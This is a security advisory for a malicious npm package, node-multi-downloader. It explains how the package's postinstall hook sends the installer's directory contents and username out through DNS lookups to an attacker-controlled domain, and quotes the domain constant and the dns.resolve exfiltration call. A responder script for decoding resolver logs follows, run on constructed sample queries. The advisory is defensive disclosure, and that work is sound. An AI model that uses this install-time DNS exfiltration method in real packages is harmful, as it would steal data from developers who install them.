
MAL-2026-5735

Malicious code in node-multi-downloader (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (8fc720cd970f4d19212ca90945b7fc1e4e1c64da98235ff595b3792ae69e3e68)

On `npm install`, this package's postinstall hook (`node index.js`) hex-encodes the installer's current working directory, the first 15 entries of that directory, and `os.userInfo().username`, and leaks each chunk via DNS A-record lookups to subdomains of the attacker-controlled domain `uqlyosvp1f9.oob.evilsec.xyz`. The hardcoded out-of-band domain is bound at index.js line 1 (`const D = "uqlyosvp1f9.oob.evilsec.xyz"`) and index.js line 8 calls ``dns.resolve(`${chunk}.${tag}${i}.${D}`, 'A',...)`` to transmit the encoded data. DNS-subdomain encoding is a well-known technique to evade HTTP egress filtering. The package metadata (description "RSI package!", anonymous author, release-candidate version) provides no legitimate purpose that would justify reading the installer's filesystem and identity at install time.
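For responders checking resolver logs against this record, the following added example (not code from the package or from the advisory source) regroups queries under the advisory's domain by tag and index and hex-decodes them to show what left the host. The tag letters, the assumption that the `${tag}${i}` label is letters followed by a decimal index, and the sample query names are all constructed for illustration.

```javascript
// Added example: tag names ("c", "u") and the sample queries are constructed.
const OOB_DOMAIN = "uqlyosvp1f9.oob.evilsec.xyz"; // domain named in the advisory
// Assumed label layout, following the advisory: <hexchunk>.<tag><index>.<domain>
const LABELS = /^([0-9a-f]+)\.([a-z]+)(\d+)$/;

function reassembleExfil(queryNames, domain = OOB_DOMAIN) {
  const suffix = "." + domain.toLowerCase();
  const streams = new Map(); // tag -> Map(index -> hex chunk)
  const undecoded = [];      // hits on the domain that do not fit the layout
  for (const raw of queryNames) {
    const name = raw.toLowerCase().replace(/\.$/, ""); // case-insensitive, drop root dot
    if (!name.endsWith(suffix)) continue;              // unrelated lookup
    const m = LABELS.exec(name.slice(0, -suffix.length));
    if (!m) { undecoded.push(name); continue; }        // still an indicator hit
    const [, hex, tag, index] = m;
    if (!streams.has(tag)) streams.set(tag, new Map());
    streams.get(tag).set(Number(index), hex);          // retried queries collapse here
  }
  const decoded = {};
  for (const [tag, chunks] of streams) {
    // Logs can reorder queries, so rebuild each stream by its index.
    const hex = [...chunks.entries()].sort((a, b) => a[0] - b[0]).map(([, h]) => h).join("");
    decoded[tag] = Buffer.from(hex, "hex").toString("utf8");
  }
  return { decoded, undecoded };
}

// Constructed resolver-log query names (not real traffic).
const SAMPLE_QUERIES = [
  "63692f617070.c1.uqlyosvp1f9.oob.evilsec.xyz",
  "registry.npmjs.org",
  "2f686f6d652f.c0.uqlyosvp1f9.oob.evilsec.xyz",
  "2f686f6d652f.c0.uqlyosvp1f9.oob.evilsec.xyz",
  "6275696c646572.u0.UQLYOSVP1F9.OOB.evilsec.xyz.",
  "zz11.c2.uqlyosvp1f9.oob.evilsec.xyz",
];

console.log(reassembleExfil(SAMPLE_QUERIES));
```

Any entry in `undecoded` is still a lookup under the advisory's domain and marks the host as having run the hook, even though its content could not be recovered.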

Affected packages

npm / node-multi-downloader

No fixed version published yet for node-multi-downloader (npm). Pin to a known-safe version or switch to an alternative.

References